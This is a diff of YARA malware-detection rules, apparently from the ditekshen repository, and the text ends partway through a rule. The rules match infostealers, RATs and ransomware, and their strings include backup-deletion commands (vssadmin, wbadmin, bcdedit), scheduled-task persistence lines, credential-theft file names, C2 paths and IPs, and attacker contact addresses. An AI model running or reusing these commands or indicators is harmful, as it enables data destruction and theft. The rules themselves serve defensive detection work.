"https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "64e00325a5a6a595067c6133800e73d943f45e2783475c24ed4a9bd9937fe0d6" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/indicator_knownbad_id.yar#L1710-L1723" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "5975a730ad1a1f7e54e95ec5897aa2940ccc3ed1aa8e83b38cb7ac836c233208" score = 75 - quality = 75 - tags = "FILE" - snort2_sid = "920079-920082" - snort3_sid = "920079-920082" - clamav_sig = "MALWARE.Win.Trojan.BlackNET" + quality = 67 + tags = "" strings: - $s1 = "SbieCtrl" fullword wide - $s2 = "SpyTheSpy" fullword wide - $s3 = "\\BlackNET.dat" fullword wide - $s4 = "StartDDOS" fullword wide - $s5 = "UDPAttack" fullword wide - $s6 = "ARMEAttack" fullword wide - $s7 = "TCPAttack" fullword wide - $s8 = "HTTPGetAttack" fullword wide - $s9 = "RetriveLogs" fullword wide - $s10 = "StealPassword" fullword wide - $s11 = "/create /f /sc ONSTART /RL HIGHEST /tn \"'" fullword wide - $b1 = "DeleteScript|BN|" fullword wide - $b2 = "|BN|Online" fullword wide - $b3 = "NewLog|BN|" fullword wide - $cnc1 = "/getCommand.php?id=" fullword wide - $cnc2 = "/upload.php?id=" fullword wide - $cnc3 = "connection.php?data=" fullword wide - $cnc4 = "/receive.php?command=" fullword wide + $s1 = "@root_backdoor_synaptics_V" ascii wide nocase + $s2 = "@DosX_Plus" ascii wide nocase + $s3 = "@Cinoshi_Adm" ascii wide nocase + $s4 = "@ac3ss0r" ascii wide nocase + $s5 = "MCwRK1Z7K4GYHt9ZrbTR2SMCEqzqQaTbRF" ascii wide + $s6 = "0x334F093c9De6552AF4cC0B252dA82aC77FeB467D" ascii wide condition: - uint16(0)==0x5a4d and (9 of ($s*) or all of ($cnc*) or all of ($b*) or 12 of them ) + any of them } -import "pe" - -rule DITEKSHEN_MALWARE_Win_Stormkitty : FILE +rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Blackhunt { meta: - description = "Detects StormKitty infostealer" - author = "ditekSHen" - id = "a061a1c0-9ed5-5048-85df-4d7ed6995e92" - date = "2024-09-06" - modified = "2024-09-06" + description = "Detects files referencing identities associated with BlackHunt ransomware" + author = "ditekShen" + id = "87613fcc-7d9a-57ba-9653-c48760dd5ef0" + date = "2024-01-23" + modified = "2024-01-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L2252-L2269" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "5d139aad6932f177cd14e0356f822ad68ddc659ea4fabd2fd2fbcbc8bad58888" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/indicator_knownbad_id.yar#L1725-L1739" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "6b875d4abdedc8032f89ab3cbdf4acdc855d83b5bcc08f96b2fbc38b4a5daa7f" score = 75 - quality = 75 - tags = "FILE" - clamav_sig = "MALWARE.Win.Trojan.StormKitty" + quality = 61 + tags = "" strings: - $x1 = "\\ARTIKA\\Videos\\Chrome-Password-Recovery" ascii - $x2 = "https://github.com/LimerBoy/StormKitty" fullword ascii - $x3 = "StormKitty" fullword ascii - $s1 = "GetBSSID" fullword ascii - $s2 = "GetAntivirus" fullword ascii - $s3 = "C:\\Users\\Public\\credentials.txt" fullword wide - $s4 = "^([a-zA-Z0-9_\\-\\.]+)@([a-zA-Z0-9_\\-\\.]+)\\.([a-zA-Z]{2,5})$" fullword wide - $s5 = "BCrypt.BCryptGetProperty() (get size) failed with status code:{0}" fullword wide - $s6 = "\"encrypted_key\":\"(.*?)\"" fullword wide + $s1 = "onion746@onionmail.com" ascii wide nocase + $s2 = "amike1096@gmail.com" ascii wide nocase + $s3 = "decryptyourdata@msgsafe.io" ascii wide nocase + $s4 = "decryptyourdata@onionmail.org" ascii wide nocase + $s5 = "Teikobest@gmail.com" ascii wide nocase + $s6 = "Loxoclash@gmail.com" ascii wide nocase + $s7 = "://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion" ascii wide nocase condition: - uint16(0)==0x5a4d and (2 of ($x*) or 5 of ($s*) or (3 of ($s*) and 1 of ($x*))) + any of them } import "pe" -rule DITEKSHEN_MALWARE_Win_Bulz01 : FILE +rule DITEKSHEN_MALWARE_Win_Laturo : FILE { meta: - description = "Detects trojan loader" + description = "Laturo information stealer payload" author = "ditekSHen" - id = "4ac4125b-70f5-5cda-ae45-fd5713e25a6e" - date = "2024-09-06" - modified = "2024-09-06" + id = "221a1ee8-e1ae-558c-919c-e3f55c1500f0" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L2271-L2281" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "29884dda4936016660f5d1e33ffcf97a20c7d3116483a5895a5e2a1dd4ac9e9f" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L3-L26" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "bfb0c5676c926f58a4395a56dad09b37e8ac1cf0bf6b5521767c16698644b73a" score = 75 - quality = 75 + quality = 61 tags = "FILE" + clamav_sig = "MALWARE.Win.Trojan.Laturo" strings: - $s1 = "DisableTrivet.dll" fullword ascii + $str1 = "cmd.exe /c ping 127.0.0.1" ascii wide + $str2 = "cmd.exe /c start" ascii wide + $str3 = "\\RapidLoader\\" ascii + $str4 = "loader/gate.php" ascii wide + $str5 = "Hwid:" ascii wide + $str6 = "Special:" ascii wide + $str7 = "logs=%s" ascii + $data1 = "cookies.%u.txt" nocase ascii wide + $data2 = "passwords.%u.txt" nocase ascii wide + $data3 = "credentials.%u.txt" nocase ascii wide + $data4 = "cards.%u.txt" nocase ascii wide + $data5 = "autofill.%u.txt" nocase ascii wide + $data6 = "loginusers.vdf" ascii wide + $data7 = "screenshot.bmp" nocase ascii wide + $data8 = "webcam.bmp" nocase ascii wide condition: - uint16(0)==0x5a4d and pe.is_dll() and all of ($s*) and (pe.exports("Ordinal") or pe.exports("Chechako") or pe.exports("Originator") or pe.exports("Repressions")) + uint16(0)==0x5a4d and 5 of ($str*) and 1 of ($data*) } import "pe" -rule DITEKSHEN_MALWARE_Win_Revcoderat : FILE +rule DITEKSHEN_MALWARE_Win_Xpertrat : FILE { meta: - description = "Detects RevCode/WebMonitor RAT" + description = "XpertRAT payload" author = "ditekSHen" - id = "4acf6742-7f5c-5126-89cc-b39b1acd922e" - date = "2024-09-06" - modified = "2024-09-06" + id = "cea7de47-b47c-5fea-96ee-5858b16cca8d" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L2283-L2332" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "e5bf1ce79b7955f597df1a9e361a3be892de55cd3db767278d4ccc02ace9e9f5" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L28-L56" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "2a521bd1d6ce16fa16aa7757db2657dcab15e6802454ad899906d4ed17401feb" score = 75 - quality = 48 + quality = 63 tags = "FILE" - snort2_sid = "920070" - snort3_sid = "920070" - clamav_sig = "MALWARE.Win.Trojan.RevCodeRAT" + snort_sid = "920003-920006" + clamav_sig = "MALWARE.Win.Trojan.XpertRAT" strings: - $x1 = "rev-novm.dat" fullword wide - $x2 = "WebMonitor-" fullword wide - $x3 = "WebMonitor Client" fullword wide - $x4 = "Launch WebMonitor" fullword wide - $s1 = "KEYLOG_DEL" fullword ascii - $s2 = "KEYLOG_STREAM_START" fullword ascii - $s3 = "send_keylog_del" fullword ascii - $s4 = "send_keylog_stream_" ascii - $s5 = "send_shell_exec" fullword ascii - $s6 = "send_file_download_exec" fullword ascii - $s7 = "send_pdg_exec" fullword ascii - $s8 = "send_app_cmd_upd" fullword ascii - $s9 = "send_webcamstream_start" fullword ascii - $s10 = "send_screenstream_start" fullword ascii - $s11 = "send_clipboard_get" fullword ascii - $s12 = "send_pdg_rev_proxy_stop" fullword ascii - $s13 = "send_shell_stop" fullword ascii - $s14 = "send_wnd_cmd" fullword ascii - $s15 = "SCREEN_STREAM_LEGACY(): Started..." fullword ascii - $s16 = "SYSTEM_INFORMATION(): Failed! (Error:" fullword ascii - $s17 = "TARGET_HOST_UPDATE(): Sync successful!" fullword ascii - $s18 = "PLUGIN_PROCESS_REVERSE_PROXY: Plugin" ascii - $s19 = "PLUGIN_PROCESS: Plugin" ascii - $s20 = "PLUGIN_EXEC: Plugin" ascii - $s21 = "PLUGIN_PROCESS_SCREEN_STREAM: Plugin" ascii - $cnc1 = "?task_id=" fullword ascii - $cnc2 = "&operation=" fullword ascii - $cnc3 = "&filesize=" fullword ascii - $cnc4 = "pos=" fullword ascii - $cnc5 = "&mode=" fullword ascii - $cnc6 = "&cmp=1" fullword ascii - $cnc7 = "&cmp=0" fullword ascii - $cnc8 = "&enc=1" fullword ascii - $cnc9 = "&enc=0" fullword ascii - $cnc10 = "&user=" fullword ascii - $cnc11 = "&uid=" fullword ascii - $cnc12 = "&key=" fullword ascii + $v1 = "[XpertRAT-Mutex]" fullword wide + $v2 = "XPERTPLUGIN" fullword wide + $v3 = "+Xpert+3." wide + $v4 = "keylog.tmp" fullword wide + $v5 = "\\TempReg.reg" fullword wide + $s1 = "ClsKeylogger" fullword ascii nocase + $s2 = "clsCamShot" fullword ascii nocase + $s3 = "ClsShellCommand" fullword ascii nocase + $s4 = "ClsRemoteDesktop" fullword ascii nocase + $s5 = "ClsScreenRemote" fullword ascii nocase + $s6 = "ClsSoundRemote" fullword ascii nocase + $s7 = "MdlHidder" fullword ascii + $s8 = "modKeylog" fullword ascii + $s9 = "modWipe" fullword ascii + $s10 = "modDelProcInUse" fullword ascii + $s11 = "Socket_DataArrival" fullword ascii + $s12 = "cZip_EndCompress" fullword ascii condition: - uint16(0)==0x5a4d and (3 of ($x*) or all of ($cnc*) or 8 of ($s*) or (1 of ($x*) and 6 of ($s*)) or (6 of ($cnc*) and 6 of ($s*))) + uint16(0)==0x5a4d and (3 of ($v*) or 6 of ($s*)) } import "pe" -rule DITEKSHEN_MALWARE_Win_Powerpool_STG1 : FILE +rule DITEKSHEN_MALWARE_Win_Isrstealer : FILE { meta: - description = "Detects first stage PowerPool backdoor" + description = "ISRStealer payload" author = "ditekSHen" - id = "8531c22d-8d71-5794-b9c8-0a4cd81bb2b0" - date = "2024-09-06" - modified = "2024-09-06" + id = "d6c3acdd-e881-5f97-8856-b7b60f56a1c2" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L2334-L2361" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "9ab00d6e3007743a8bb30fbcdb435ac49101b52face55549ae454c64345caff9" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L112-L128" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "5dd030ab8122b5dd432168647c7a3465cb3593a326f68b4863a91d16587641e5" score = 75 quality = 75 tags = "FILE" - snort2_sid = "920088" - snort3_sid = "920086" - clamav_sig = "MALWARE.Win.Trojan.PowerPool-STG-1" + clamav_sig = "MALWARE.Win.Trojan.ISRStealer" strings: - $s1 = "cmd /c powershell.exe $PSVersionTable.PSVersion > \"%s\"" fullword wide - $s2 = "cmd /c powershell.exe \"%s\" > \"%s\"" fullword wide - $s3 = "rar.exe a -r %s.rar -ta%04d%02d%02d%02d%02d%02d -tb%04d%02d%02d%02d%02d%02d" fullword wide - $s4 = "MyDemonMutex%d" fullword wide - $s5 = "MyScreen.jpg" fullword wide - $s6 = "proxy.log" fullword wide - $s7 = "myjt.exe" fullword wide - $s8 = "/?id=%s&info=%s" fullword wide - $s9 = "auto.cfg" fullword ascii - $s10 = "Mozilla/5.0 (Windows NT 6.1; WOW64)" fullword wide - $s11 = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)" fullword wide - $s12 = "CMD COMMAND EXCUTE ERROR!" fullword ascii - $c1 = "run.afishaonline.eu" fullword wide - $c2 = "home.Sports-Collectors.com" fullword wide - $c3 = "about.Sports-Collectors.com" fullword - $c4 = "179.43.158.15" fullword wide - $c5 = "185.227.82.35" fullword wide + $s1 = "&password=" wide + $s2 = "&pcname=" wide + $s3 = "MSVBVM60.DLL" ascii + $s4 = "MSVBVM60.DLL" wide + $s5 = "Core Software For : Public" wide + $s6 = "</Host>" wide + $s7 = "</Pass>" wide + $s8 = "/scomma" wide condition: - uint16(0)==0x5a4d and ( all of ($s*) or (1 of ($c*) and 5 of ($s*))) + ( uint16(0)==0x5a4d and filesize <4000KB and 6 of them ) or all of them } import "pe" -rule DITEKSHEN_MALWARE_Win_Powerpool_STG2 : FILE +rule DITEKSHEN_MALWARE_Win_Quasarrat : FILE { meta: - description = "Detects second stage PowerPool backdoor" + description = "QuasarRAT payload" author = "ditekSHen" - id = "1a059900-3292-5419-a143-caea3e710191" - date = "2024-09-06" - modified = "2024-09-06" + id = "f256b88f-eee6-5f8c-afd6-32ed10ea908d" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L2363-L2395" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "b80712bab281dbde816e2eda6ab1b4a9e21be26578fb755a1e1e1635675aa911" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L130-L150" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "556b19dc0980761198ea31a285f281adae084463d24bff1eda15326436ad562b" score = 75 - quality = 73 + quality = 75 tags = "FILE" - snort2_sid = "920089-920091" - snort3_sid = "920087-920089" - clamav_sig = "MALWARE.Win.Trojan.PowerPool-STG-2" strings: - $s1 = "write info fail!!! GetLastError-->%u" fullword ascii - $s2 = "LookupAccountSid Error %u" fullword ascii - $s3 = "Mozilla/4.0 (compatible; )" fullword ascii - $s4 = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; SE)" fullword ascii - $s5 = "Content-Disposition: form-data; name=\"%s\"" fullword ascii - $s6 = "Content-Disposition: form-data; name=\"%s\"; filename=\"%s\"" fullword ascii - $s7 = "Content-Type: multipart/form-data; boundary=--MULTI-PARTS-FORM-DATA-BOUNDARY" fullword ascii - $s8 = "in Json::Value::find" fullword ascii - $s9 = "in Json::Value::resolveReference" fullword ascii - $s10 = "in Json::Value::duplicateAndPrefixStringValue" fullword ascii - $s11 = ".?AVLogicError@Json@@" fullword ascii - $s12 = ".?AVRuntimeError@Json@@" fullword ascii - $s13 = "http:\\\\82.221.101.157:80" ascii - $s14 = "http://172.223.112.130:80" ascii - $s15 = "http://172.223.112.130:443" ascii - $s16 = "http://info.newsrental.net:80" ascii - $s17 = "%s|%I64d" ascii - $s18 = "open internet failed..." ascii - $s19 = "connect failed..." ascii - $s20 = "handle not opened..." ascii - $s21 = "corrupted regex pattern" fullword ascii - $s22 = "add cookie failed..." ascii + $s1 = "GetKeyloggerLogsResponse" fullword ascii + $s2 = "GetKeyloggerLogs" fullword ascii + $s3 = "/>Log created on" wide + $s4 = "User: {0}{3}Pass: {1}{3}Host: {2}" wide + $s5 = "Domain: {1}{0}Cookie Name: {2}{0}Value: {3}{0}Path: {4}{0}Expired: {5}{0}HttpOnly: {6}{0}Secure: {7}" wide + $s6 = "grabber_" wide + $s7 = "<virtualKeyCode>" ascii + $s8 = "<RunHidden>k__BackingField" fullword ascii + $s9 = "<keyboardHookStruct>" ascii + $s10 = "add_OnHotKeysDown" ascii + $mutex = "QSR_MUTEX_" ascii wide + $ua1 = "Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0" fullword wide + $us2 = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A" fullword wide condition: - uint16(0)==0x5a4d and 14 of them + uint16(0)==0x5a4d and ($mutex or ( all of ($ua*) and 2 of them ) or 6 of ($s*)) } import "pe" -rule DITEKSHEN_MALWARE_Win_Egregor : FILE +rule DITEKSHEN_MALWARE_Win_Limerat : FILE { meta: - description = "Detects Egregor ransomware variants" + description = "LimeRAT payload" author = "ditekSHen" - id = "2e24d4ec-39c2-5148-80a1-04f96bc8b477" - date = "2024-09-06" - modified = "2024-09-06" + id = "a4b85cad-97a8-514c-9380-f3e8ec95a44d" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L2397-L2434" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "d39a7bf89a7574f7dfe56db78c8cdbbee97782f829805d4ee87fd9f1635154cd" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L152-L168" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "8ae35c5fa48773b93da0b76b238fc8dbaf19fdeb6fd81bf23842c5121d620116" score = 75 quality = 75 tags = "FILE" - clamav_sig = "MALWARE.Win.Ransomware.Egregor" strings: - $s1 = "C:\\Logmein\\{888-8888-9999}\\Logmein.log" fullword wide - $p1 = "--deinstall" fullword wide - $p2 = "--del" fullword wide - $p3 = "--exit" fullword wide - $p4 = "--kill" fullword wide - $p5 = "--loud" fullword wide - $p6 = "--nooperation" fullword wide - $p7 = "--nop" fullword wide - $p8 = "--skip" fullword wide - $p9 = "--useless" fullword wide - $p10 = "--yourmommy" fullword wide - $p11 = "-passegregor" ascii wide - $p12 = "-peguard" ascii wide - $p13 = "--nomimikatz" ascii wide - $p14 = "--multiproc" ascii wide - $p15 = "--killrdp" ascii wide - $p16 = "--nonet" ascii wide - $p17 = "--norename" ascii wide - $p18 = "--greetings" ascii wide + $s1 = "schtasks /create /f /sc ONLOGON /RL HIGHEST /tn LimeRAT-Admin /tr" wide + $s2 = "\\vboxhook.dll" fullword wide + $s3 = "Win32_Processor.deviceid=\"CPU0\"" fullword wide + $s4 = "select CommandLine from Win32_Process where Name='{0}'" wide + $s5 = "Minning..." fullword wide + $s6 = "Regasm.exe" fullword wide + $s7 = "Flood!" fullword wide + $s8 = "Rans-Status" fullword wide + $s9 = "cmd.exe /c ping 0" wide condition: - ( uint16(0)==0x5a4d and pe.is_dll() and (( all of ($s*) and 1 of ($p*)) or (2 of them and filesize <1000KB and for any i in (0..pe.number_of_sections) : ((pe.sections[i].name==".00cfg"))))) or 8 of ($p*) + uint16(0)==0x5a4d and 5 of them } import "pe" -rule DITEKSHEN_MALWARE_Win_Redlinedropperexe : FILE +rule DITEKSHEN_MALWARE_Win_Arkei : FILE { meta: - description = "Detects executables dropping RedLine infostealer" + description = "Detect Arkei infostealer variants" author = "ditekSHen" - id = "364ba540-60a5-5e1b-bb21-505a442eabb6" - date = "2024-09-06" - modified = "2024-09-06" + id = "d32a27bf-abb9-553c-9913-d675c340a5c5" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L2461-L2484" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "cd1fb4a1d0883221dbdcc519db7f54b0f7285e8a19201dbc586c2520e8086bc2" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L210-L226" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "8a79bcc6ac94900c8a8913b2e81424bf900bbac416f44a91db6f208f23980155" score = 75 quality = 75 tags = "FILE" - clamav_sig = "MALWARE.Win.Trojan.RedLineDropper-EXE" strings: - $s1 = "Wizutezinod togeto0Rowadufevomuki futenujilazem jic lefogatenezinor" fullword wide - $s2 = "6Tatafamobevofaj bizafoju peyovavacoco lizine kezakajuj" fullword wide - $s3 = "Lawuherusozeru kucu zam0Zorizeyuk lepaposupu gala kinarusot ruvasaxehuwo" fullword wide - $s4 = "ClearEventLogW" fullword ascii - $s5 = "ProductionVersion" fullword wide - $s6 = "Vasuko)Yugenizugilobo toxocivoriye yexozoyohuzeb" wide - $s7 = "Yikezevavuzus gucajanesan#Rolapucededoxu xewulep fuwehofiwifi" wide + $s1 = "C:\\Windows\\System32\\cmd.exe" fullword ascii wide + $s2 = "/c taskkill /im " fullword ascii + $s3 = "card_number_encrypted FROM credit_cards" ascii + $s4 = "\\wallet.dat" ascii + $s5 = "Arkei/" wide + $s6 = "files\\passwords." ascii wide + $s7 = "files\\cc_" ascii wide + $s8 = "files\\autofill_" ascii wide + $s9 = "files\\cookies_" ascii wide condition: - uint16(0)==0x5a4d and (pe.exports("_fgeek@8") and 2 of them ) or (2 of them and for any i in (0..pe.number_of_sections) : ((pe.sections[i].name==".rig"))) + uint16(0)==0x5a4d and all of them } import "pe" -rule DITEKSHEN_MALWARE_Win_Nibiru : FILE +rule DITEKSHEN_MALWARE_Win_Dcrat : FILE { meta: - description = "Detects Nibiru ransomware" + description = "DCRat payload" author = "ditekSHen" - id = "78c3bf75-1ab3-5f88-ba4b-d5a0a906d57c" - date = "2024-09-06" - modified = "2024-09-06" + id = "16c81fe0-2c18-55e9-aa17-cfd4213d6a17" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L2486-L2504" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "f3718e9091b09e0f47ecd6715a3a2c160ede6ab9fb144e7ed115dd5a25c8e379" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L228-L292" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "5a02dcc2b9c7eb3efdba39047e37886240b45fb7e2db3b82aa5b4b9526dfb7f8" score = 75 - quality = 75 + quality = 50 tags = "FILE" - clamav_sig = "MALWARE.Win.Ransomware.Nibiru" strings: - $s1 = ".encrypt" fullword wide - $s2 = "crypted" fullword wide - $s3 = ".Nibiru" fullword wide - $s4 = "Encryption Complete" fullword wide - $s5 = "All your files,documents,important datas,mp4,mp3 and anything valuable" ascii - $s6 = "EncryptOrDecryptFile" fullword ascii - $s7 = "get_hacker" ascii - $s8 = "/C choice /C Y /N /D Y /T 3 & Del \"" fullword wide - $s9 = "Once You pay,you get the KEY to decrypt files" ascii - $pdb = "\\Projects\\Nibiru\\Nibiru\\obj\\x86\\Release\\Nibiru.pdb" ascii + $dc1 = "DCRatBuild" ascii + $dc2 = "DCStlr" ascii + $x1 = "px\"><center>DCRat Keylogger" wide + $x2 = "DCRat-Log#" wide + $x3 = "DCRat.Code" wide + $string1 = "CaptureBrowsers" fullword ascii + $string2 = "DecryptBrowsers" fullword ascii + $string3 = "Browsers.IE10" ascii + $string4 = "Browsers.Chromium" ascii + $string5 = "WshShell" ascii + $string6 = "SysMngmts" fullword ascii + $string7 = "LoggerData" fullword ascii + $plugin = "DCRatPlugin" fullword ascii + $av1 = "AntiVM" ascii wide + $av2 = "vmware" fullword wide + $av3 = "VirtualBox" fullword wide + $av4 = "microsoft corporation" fullword wide + $av5 = "VIRTUAL" fullword wide + $av6 = "DetectVirtualMachine" fullword ascii + $av7 = "Select * from Win32_ComputerSystem" fullword wide + $pl1 = "dcratAPI" fullword ascii + $pl2 = "dsockapi" fullword ascii + $pl3 = "file_get_contents" fullword ascii + $pl4 = "classthis" fullword ascii + $pl5 = "typemdt" fullword ascii + $pl6 = "Plugin_AutoStealer" ascii wide + $pl7 = "Plugin_AutoKeylogger" ascii wide + $v1 = "Plugin couldn't process this action!" wide + $v2 = "Unknown command!" wide + $v3 = "PLUGINCONFIGS" wide + $v4 = "Saving log..." wide + $v5 = "~Work.log" wide + $v6 = "MicrophoneNum" fullword wide + $v7 = "WebcamNum" fullword wide + $v8 = "%SystemDrive% - Slow" wide + $v9 = "%UsersFolder% - Fast" wide + $v10 = "%AppData% - Very Fast" wide + $v11 = /<span style=\"color: #F85C50;\">\[(Up|Down|Enter|ESC|CTRL|Shift|Win|Tab|CAPSLOCK: (ON|OFF))\]<\/span>/ wide + $px1 = "[Browsers] Scanned elements: " wide + $px2 = "[Browsers] Grabbing cookies" wide + $px3 = "[Browsers] Grabbing passwords" wide + $px4 = "[Browsers] Grabbing forms" wide + $px5 = "[Browsers] Grabbing CC" wide + $px6 = "[Browsers] Grabbing history" wide + $px7 = "[StealerPlugin] Invoke: " wide + $px8 = "[Other] Grabbing steam" wide + $px9 = "[Other] Grabbing telegram" wide + $px10 = "[Other] Grabbing discord tokens" wide + $px11 = "[Other] Grabbing filezilla" wide + $px12 = "[Other] Screenshots:" wide + $px13 = "[Other] Clipboard" wide + $px14 = "[Other] Saving system information" wide condition: - uint16(0)==0x5a4d and (7 of them or ($pdb and 2 of ($s*))) + uint16(0)==0x5a4d and ( all of ($dc*) or all of ($string*) or 2 of ($x*) or 6 of ($v*) or 5 of ($px*)) or ($plugin and (4 of ($av*) or 5 of ($pl*))) } import "pe" -rule DITEKSHEN_MALWARE_Win_Medusalocker : FILE +rule DITEKSHEN_MALWARE_Win_Firebirdrat : FILE { meta: - description = "Detects MedusaLocker ransomware" - author = "ditekshen" - id = "06b7645f-228d-5ec1-9b82-88caee447a5c" - date = "2024-09-06" - modified = "2024-09-06" + description = "Firebird/Hive RAT payload" + author = "ditekSHen" + id = "456ae70e-8004-5fb0-a4fd-ce7c0f4704f9" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L2506-L2537" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "0e2a0a9f12f550a5c6a11731710e0dc2c2e26d17f43d2385bf6e298518631771" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L316-L339" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "1c24e924171db1b99a3b03764f4551b6f4b6b1c9c6147b49dbc0651e85e9040c" score = 75 quality = 73 tags = "FILE" - clamav_sig = "MALWARE.Win.Ransomware.MedusaLocker" + clamav_sig = "MALWARE.Win.Trojan.Firebird-HiveRAT" strings: - $x1 = "\\MedusaLockerInfo\\MedusaLockerProject\\MedusaLocker\\Release\\MedusaLocker.pdb" ascii - $x2 = "SOFTWARE\\Medusa" wide - $x3 = "=?utf-8?B?0RFQctTF0YDQcNC60IXQvdC+IEludGVybmV0IED4cGxvseVyIDEz?=" ascii - $s1 = "Recovery_Instructions.mht" fullword wide - $s2 = "README_LOCK.TXT" fullword wide - $s3 = "C:\\Users\\Public\\Desktop" wide - $s4 = "[LOCKER] " wide - $s5 = "TmV3LUl0ZW0gJ2" ascii - $s6 = "<HEAD>=20" ascii - $s7 = "LIST OF ENCRYPTED FILES" ascii - $s8 = "KEY.FILE" ascii - $cmd1 = { 2f 00 63 00 20 00 64 00 65 00 6c 00 20 00 00 00 20 00 3e 00 3e 00 20 00 4e 00 55 00 4c 00 } - $cmd2 = "vssadmin.exe delete" wide nocase - $cmd3 = "bcdedit.exe /set {default}" wide - $cmd4 = "wbadmin delete systemstatebackup" wide nocase - $mut1 = "{8761ABBD-7F85-42EE-B272-A76179687C63}" fullword wide - $mut2 = 